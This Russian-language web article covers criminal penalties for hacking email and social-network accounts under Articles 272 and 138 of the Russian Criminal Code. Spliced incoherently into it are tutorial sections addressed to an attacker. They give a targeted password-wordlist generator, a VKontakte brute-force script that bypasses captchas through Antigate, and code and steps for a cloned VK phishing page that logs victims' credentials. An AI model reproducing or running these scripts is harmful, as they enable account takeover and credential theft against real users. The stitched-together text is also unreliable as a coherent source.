Современная жизнь уже «одной ногой» перешла в виртуальную реальность, которая завязана на аккаунтах в социальных сетях, электронных средствах связи, мессенджерах и любых других сетевых ресурсах. Подобная популярность создаёт необходимость для каждого пользователя серьёзно задуматься о своей информационной безопасности и сохранности личных данных/сведений, в том числе потому, что сейчас у многих сетевых ресурсов существуют собственные платёжные средства, объём которых достаточно внушителен. В настоящей статье речь и пойдёт о том, какая ответственность, а следовательно и наказание, ожидает виновных за взлом аккаунтов электронной почты и социальных сетей.
Виды наказаний за взлом аккаунтов электронной почты и социальных сетей.
Что взламывают хакеры
Один из самых часто встречающихся видов взлома в компьютерной среде — это проникновение в чужую электронную почту, которая обычно есть у всех пользователей, так как ее необходимо иметь для регистрации на сайтах и в приложениях на смартфоне.
Доступ к ней может означать и доступ к прочим ресурсам гражданина, поэтому она так часто становится предметом преступления. Это же относится и к почте предприятий, которая является общей для всех сотрудников, а значит, и более легкой добычей для правонарушителей.
Чаще всего взламывают чужую электронную почту.
Иногда это делается с целью последующего вымогательства денег, если преступники нашли какую-то личную информацию гражданина или получили доступ к секретам компании.
Нередко следствием взлома электронной почты является и проникновение в чужие социальные сети. Попадая в аккаунт пользователя, злоумышленник получает доступ к его личной жизни, фотографиям и сведениям, которые тот хотел бы оставить без распространения.
Еще очень популярны взломы сайтов или блогов. Это совершается либо в корыстных целях (шантаж), либо чтобы просто поглумиться над владельцем сайта.
2) «Умный» перебор
Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:
- Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2021 = 2021, 1992, 24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
- Аккаунты из других соц. сетей и почтовые сервисы (twitter.com/stasik_ku , facebook.com/stasss1992, = stasik_iv, stasss1992, stasss92).
- Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).
Также есть страница вк, на которой написано, какие пароли следует указывать, какие символы возможны и самые частые пароли. Получился лист из 14 строк. Но из него еще нужно создать комбинации паролей, которые могла бы создать наша жертва. Представляю вам мой небольшой скрипт на python, который этим и занимается.
#! coding:utf-8 import sys,os razdel = [‘_’,’:’,’;’] def uniq(seq): seen = set() seen_add = seen.add return def brute_words(words): new_words = [] for i in words: new_words.append(i) new_words.append(i[0].upper() + i[1:]) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper()) new_words.append(i.upper()) for j in spisok: new_words.append(i + j) for m in razdel: new_words.append(j + m + i) new_words.append(j + i) new_words.append(i * 2 + j) new_words.append(j * 2 + i) new_words.append(i[0].upper() + i[1:] + j) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j) return uniq(new_words) def generate(words_file): o = open(words_file, ‘r’) words = o.read().splitlines() for i in brute_words(words): print(i) def main(): try: argv1 = sys.argv[1] generate(argv1) except IndexError: print(«Нужно указать файл») except IOError: print(«Нет такого файла») if __name__ == «__main__»: main()
Из 14 получилось 1272 варианта. Приведу часть.
Molodegkactac MolodegkActac molodejka_molodegka Stasss92molodejka stasss92molodegka molodegka_stasss92 molodegka:stasss92 molodegka;stasss92 stasss1992swimming swimming_stasss1992 Kurayginctac KuraygiNctac kurayginkuraygin kuraygin_kuraygin molodegka17111992 1711199217111992molodegka molodegkamolodegka17111992 24 1711_24
Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.
#! coding: utf8 import grab, re, urllib2 from antigate import AntiGate from grab import GrabTimeoutError from time import sleep cap_key = ‘123 ‘ #Ваш ключ с Antigate def anti(key, file): #Получение решения Captcha с Antigate try: try: data = AntiGate(key, file) return data except KeyboardInterrupt: print(«Завершение») except: anti(key, file) def save(url, file): #Скачивание файла по URL site = urllib2.urlopen(url) f = open(file, ‘wb’) f.write(site.read()) def cap_solve(img): save(img, ‘captcha.jpg’) key = anti(cap_key, ‘captcha.jpg’) return key def brute(login, passwords, save): out = open(save, ‘w’) psswrds = open(passwords,’r’) try: int(login) prefix = True except: prefix = False g = grab.Grab() g.go(‘https://m.vk.com’) for line in psswrds: psswrd = line.rstrip(‘\r\n’) g.doc.set_input(’email’, login) g.doc.set_input(‘pass’, psswrd) g.doc.submit() if g.doc.text_search(u’captcha’): all_captchas = re.findall(‘»(/captcha.php[^»]*)»‘, g.response.body)[0] captcha = » + all_captchas key = cap_solve(captcha) g.doc.set_input(’email’, login) g.doc.set_input(‘pass’, psswrd) g.doc.set_input(‘captcha_key’, str(key)) g.doc.submit() print(«cap») if ‘Подтвердить’ in g.response.body: if prefix: prefix1 = g.doc.rex_search(‘\+[0-9]*’).group(0) prefix2 = g.doc.rex_search(‘ [0-9]*’).group(0) pre1 = re.findall(‘[0-9]{1,}’, prefix1)[0] pre2 = re.findall(‘[0-9]{1,}’, prefix2)[0] login = login.replace(pre1, ») login = login.replace(pre2, ») g.set_input(‘code’, login) g.submit() print(login + ‘:’ + psswrd + ‘—success’) out.write(login + ‘:’ + psswrd + ‘\n’) else: out.write(login + ‘:’ + psswrd + ‘\n’) else: if g.doc.rex_search(‘[^>]+’).group(0) == ‘Login | VK’: print(login + ‘:’ + psswrd + ‘—fail’) else: print(login + ‘:’ + psswrd + ‘—success’) out.write(login + ‘:’ + psswrd + ‘\n’) out.close() psswrds.close()
Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch’и, появляющиеся после 5-6 попытки ввода с одного IP.
Краткое содержание ст. 272 УК РФ с комментариями
Ответственность за взлом предусмотрена по ст. 272 УК РФ, состоящей из 4 частей и 2 примечаний. В первой части говорится о тех мерах пресечения, которые назначаются за противоправный доступ к компьютерной информации, если это повлекло любые ее изменения или копирование.
В первом примечании дается определение такому термину, как компьютерная информация. Это сведения, которые представлены в виде электрических сигналов, независимо от типа их хранения или обработки.
В следующих частях указаны те наказания, которые назначаются при данном правонарушении с учетом наличия некоторых отягчающих обстоятельств:
- в ч. 2 — при причинении крупного ущерба (в примечании №2 указано, что крупный ущерб начинается от миллиона рублей) либо при совершении в корыстных целях;
- в ч. 3 — если преступники были объединены в целую группу лиц, заранее спланировавшую правонарушение, либо если лицо использовало при этом свое служебное положение (наличие доступа к общей электронной почте или особым сведениям компании);
- в ч. 4 — о тех же преступлениях, но если они повлекли тяжелые последствия для пострадавшей стороны или их угрозу.
3) «Фейк — наше все»
Способ, ориентированный на невнимательных юзеров. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк (страницы логина). Можете брать как мобильную, так и основную версии, зависит от того, с какого устройства будет заходить ваша цель. Что ж, приступим. Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8. Сначала определяем кодировку
file —mime-encoding file.html
Затем меняем с исходной на новую
iconv -f iso-8859-1 -t utf-8 file.html > vk2.html
Далее вам нужно создать управление страницей на серверном языке.
@route(‘/’) def index(): return template(‘vk2.html’) @route(‘/Welcome! | VK_files/’) def server_static(filepath): return static_file(filepath, root=’./Welcome! | VK_files/’)
Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.
mkdir images cd images wget wget «» wget «» mkdir icons cd icons wget «» wget «»
Пропишем новый роутинг в скрипте.
@route(‘/images/’) def server_static(filepath): return static_file(filepath, root=’./images/’)
Отлично. Конечно, по-хорошему надо было бы ещё также скачать основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней (а потом поменять ссылки в основной), но для начала и этого хватит. Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.
@post(‘/’) def index(): login = request.forms.get(’email’) password = request.forms.get(‘pass’) print(«|Catch|————— » + login + ‘:’ + password) with open(«log.txt», «a») as myfile: myfile.write(login + ‘:’ + password + «\n») return redirect(‘https://www.vk.com’)
В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type=»submit», и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.
Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).
Что считается неправомерным доступом
Согласно ст. 272 УК РФ, под данным термином понимается противоправное получение возможности ознакомиться с информацией или использовать ее.
Неправомерный доступ – это незаконное использование чужой информации.
Это выполняется с применением алгоритма определенных действий и с использованием специальных технических и программных средств, которые позволяют преодолеть системы защиты или применить чужие пароли или коды. Для этого преступники могут замаскироваться и под обычных пользователей, используя их пароли.
Внимание! Также неправомерный доступ выполняется лицом, не имеющим никаких прав на работу с данной информацией, в отношении которой приняты особые меры, ограничивающие круг людей, имеющих доступ к данным сведениям.
Под такими сведениями, охраняемыми законодательством РФ, понимаются объекты интеллектуальной собственности, служебные и коммерческие тайны, персональные данные и т.д.
Состав преступления
То, какая статья за взлом страницы в социальной сети или сайта используется, мы разобрали, но чтобы квалифицировать данное правонарушение как противоправный доступ к компьютерной информации, нужно определить, соответствует ли ему состав преступления.
Объективной стороной здесь выступает именно противозаконный доступ к сведениям гражданином, не имеющим на это никаких прав. Объектом данного правонарушения является безопасность компьютерной информации, а предметом — компьютерные сведения.
Субъективная сторона — это умышленная форма вины по отношению к совершаемым действиям. При этом допускается и неосторожная форма, но только если речь идет о последствиях, наступивших в результате правонарушения.
Предметом преступления являются компьютерные сведения.
В последнем случае уголовная ответственность наступает, если лицо знало о возможных результатах злодеяния, но рассчитывало, что что-то помешает им реализоваться. Также она предусмотрена в случаях, когда гражданин хоть и не предполагал их наступления, но должен был и мог это сделать.
Субъект преступления — это дееспособная личность, которая уже достигла 16-летия.
Взлом электронной почты
Электронная почта сейчас есть практически у каждого из взрослого и молодого поколения, даже самые маленькие пользователи регистрируют ее, например, как инструмент для установки приложений.
На работе персонал имеет один «ящик», дома – другой, но на каждом из них может храниться личная, ценная и даже запрещенная для большинства обычных людей информация, доступы к платежным системам и социальным сетям. Злоумышленник, естественно, хочет получить их в корыстных целях, зачастую это вымогательство с финансовой значительной выгодой.
Более подробно о таком преступлении как взлом электронной почты расскажет следующий видеосюжет:
Понятие и уголовно-правовая характеристика
Преступление, характеризующееся взломом электронного ящика, может проходить и по 272 статье УК РФ и по 138. Определим уголовно-правовой состав по каждой статье:
| 138 УК РФ | 272 УК РФ | |
| Объект | Право на сохранение тайны переписки | Право гражданина на информацию |
| Объективная сторона | Нарушение целостности соответствующего объекта | Незаконный доступ к охраняемой информации, если в результате она была изменена, скопирована, заблокирована и/или уничтожена |
| Субъект | Адекватное физическое лицо не моложе 16 лет | |
| Субъективная сторона | Прямой умысел, степень которого не влияет на ужесточение наказания | |
Квалифицирующие признаки
Преступления в сфере компьютерной безопасности очень разнообразные. Их состав достаточно формален, совершенными считаются наступившие правонарушение – фиксация факта взлома электронного ящика и отнесение к одной из статей УК РФ.
Квалифицирующие признаки преступления зависят от условий совершения преступления. Если был взломан рабочий ящик, то в их роли выступит использование служебного положения.
Любое действие, которое привело к взлому, совершавшееся противозаконно и без ведома потерпевшего, относится к квалифицирующим признакам.
Способы злодеяния
Многим внушили, что если твой пароль никто не видит, то система в безопасности. Но это далеко не так. Сам пароль сейчас уже является маленькой крупинкой в процессе получения доступа к ящику электронной почты. Механическим подбором паролей занимаются в последнюю очередь.
Вот несколько самых популярных видов активности по взлому электронной почты:
- Социальная инженерия – простые пароли, содержащие личную информацию (дата рождения, имя-фамилия и т.д.), размещение бумажек с паролями на видных местах, на рабочем столе компьютера в виде текстового документа.
- Спам-рассылки – яркое письмо, чаще всего о выигрыше или выгодном предложении, со ссылкой, которая оказывается вредоносным сайтом или исполняемым файлом.
- Фишинг – фальшивый копирующий оформление оригинала практически на 100% сайт, куда невнимательный пользователь вводит свои данные.
- Распространение нелицензионного ПО с вирусами.
О том, какая статья «светит» за взлом страницы соцсети (например, Вконтакте (ВК), Одноклассники и др.), читайте далее.
Более подробно о фишинге для взлома почты и аккаунта в социальной сети расскажет следующее видео:
Как доказывается вина, на каком основании можно подавать заявление
Взлом, согласно УК РФ, доказывается на основе конкретных фактов, а именно взлом электронного ящика, сайта или аккаунта социальных сетей.
Также это может быть и попадание личных данных или коммерческих секретов в чужие руки, к людям, которые не имеют никаких прав на их обработку или хранение.
Довольно сложно получить такие доказательства, особенно в интернете, где очень легко соблюдать анонимность. Существует всего несколько вариантов того, как их получить:
- послать письмо управляющим почтового сервиса или социальной сети с просьбой о предоставлении списка IP-адресов, по которым был осуществлен вход в них;
- некоторые социальные сети позволяют отследить список тех, кто имеет доступ к аккаунту;
- если от вашего лица приходит спам вашим знакомым и близким, а профиль недоступен, то, скорее всего, его взломали.
Взлом аккаунта в социальной сети
Проникновение за рубеж авторизации в социальных сетях чаще всего является следствием от взлома почтовых ящиков. Помимо этого пользователи совершают много ошибок, что приводит к плачевным последствиям. В руки злоумышленников попадают личные фотографии, нежелательные сообщения и подробности из жизни и многое другое, что хотелось бы скрыть от глаз посторонних.
Необходимо знать, что на данный момент взломать аккаунт социальной сети гораздо проще, чем обойти защиту достаточно известных сервисов электронной почты. Поэтому не достаточно защитить что-то одно, необходим комплекс мер. Лучшая защита – профилактика и бдительность.
Понятие и квалифицирующие признаки
Так как суть преступления по взлому ящика почты и аккаунта социальных сетей практически совпадает, то и уголовно-правовая характеристика у них одинаковая. В современном мире даже бизнес может быть организован через социальную сеть, поэтому нельзя сказать, что взлом того или иного объекта будет важнее, чем другого.
На взлом аккаунтов социальных сетей также распространяется формальность состава преступления. Отметим важное – зачастую взлом является следствием банальной невнимательности пользователя, оставив открытый профиль в интернет кафе или у друга в гостях, уже сложно будет говорить вам об уголовном составе преступления.
Способы злодеяния
К вышеперечисленным методам получения пароля можно добавить:
- Незакрытые сессии в соц. Сетях;
- Передача данных третьим лицам;
- Использование непроверенных Wifi-сетей.
Ответственность за неправомерный доступ
По различным частям данной статьи назначаются определенные меры пресечения. В этом разделе мы узнаем, какие именно и по какой части ст. 272 УК РФ они определяются.
Если правонарушение было квалифицировано по ч. 1, то наказания могут быть назначены следующие:
- штраф суммой от 200 000 рублей или заработной платы за 1,5 года;
- исправительные работы на год;
- ограничение передвижений лица на 2 года;
- принудительные работы на тот же срок;
- заключение в тюрьму на такой же временной промежуток.
По ч. 2 наказания могут быть такие:
- штраф суммой от 100 000 до 300 000 рублей или заработной платы за 1-2 года;
- исправительные работы на 1-2 года;
- ограничение передвижений на 4 года;
- принудительные работы на тот же срок;
- заключение в колонию на тот же период.
Если суд установил, что преступление проходит по ч. 3 ст. 272 УК РФ, то могут быть использованы более серьезные санкции:
- штраф суммой до 500 000 рублей или заработной платы за 3 года с введением запрета на занятие некоторых должностей или определенными видами деятельности на период до 3 лет;
- ограничение передвижений гражданина на 4 года;
- принудительные работы на 5 лет;
- заключение в тюрьму на тот же временной промежуток.
Ч. 4 предусматривает только один вид наказания — лишение свободы на период до 7 лет.
Дополнительная ответственность
В зависимости от обстоятельств происшествия могут быть применены и другие статьи УК РФ. Например, если преступник использовал вирусы или прочие вредоносные программы во вред другим пользователям, то используется ст. 273 УК РФ.
В случае когда преступник получил доступ к личным данным граждан или их переписке, могут быть применены ст. 137 и 138 УК РФ.
При назначении меры пресечения учитываются все обстоятельства дела.
Также при публикации каких-либо сведений преступник мог вызвать вражду или ненависть у пользователей. В этом случае используется ст. 282 УК РФ. Если он попытался оклеветать другого гражданина, то будет применена ст. 128.1 УК РФ.
Примеры из судебной практики
Студент взломал электронную почту другого гражданина, после чего стал вымогать у него деньги, угрожая распространением его личных данных. Его нашли сотрудники правоохранительных органов, а его действия были квалифицированы по двум статьям: 272 и 138 УК РФ. Ему назначили 7 лет заключения в тюрьме.
Сотрудница компании, предоставляющей услуги связи, скачала себе список звонков другого гражданина в личных целях. Так как судимостей у нее не имелось, то было использовано примирение сторон.
Сотрудник одной организации уничтожил по своей инициативе определенные сведения, порочащие его имя. Его действия были определены по ч. 3 ст. 272 УК РФ.
Наказание и ответственность
Для удобства воспользуемся таблицей и рассмотрим виды наказания за взлом аккаунта соц. сетей или почты:
| Тип наказания | 138 статья УК РФ | 272 статья УК РФ |
| Штраф | 100-300 тыс. рублей | До 500 тыс. рублей |
| Обязательные работы | До 480 часов | Не назначается |
| Исправительные работы | До года | До года |
| Принудительные работы | До четырех лет | До 5 лет |
| Арест | До четырех месяцев | Не назначается |
| Ограничение свободы | Не назначается | До четырех лет |
| Лишение свободы | До четырех лет | До семи лет |
Следующее видео во всех подробностях расскажет о том, какая ответственность ждет злоумышленника за взлом аккаунта в соцсети:
Зачем взламывают почты и аккаунты?
Зачем это делают? Ответ прост: злоумышленники крадут чужие страницы и почтовые ящики исключительно для того, чтобы заработать. Изначально почта изучается взломщиками на предмет наличия какой-либо ценной информации, паролей от платёжных систем и других важных данных. После того, как аккаунт обчищен, он либо используется для массового распространения рекламы (так называемого спама), или выставляется на продажу, где купят его, скорее всего, такие же рекламщики-спаммеры.
Запомните: если вы не можете ввести пароль несколько раз подряд, но точно уверены, что он правильный: бейте тревогу. Вероятнее всего, ваш почтовый ящик был взломан.
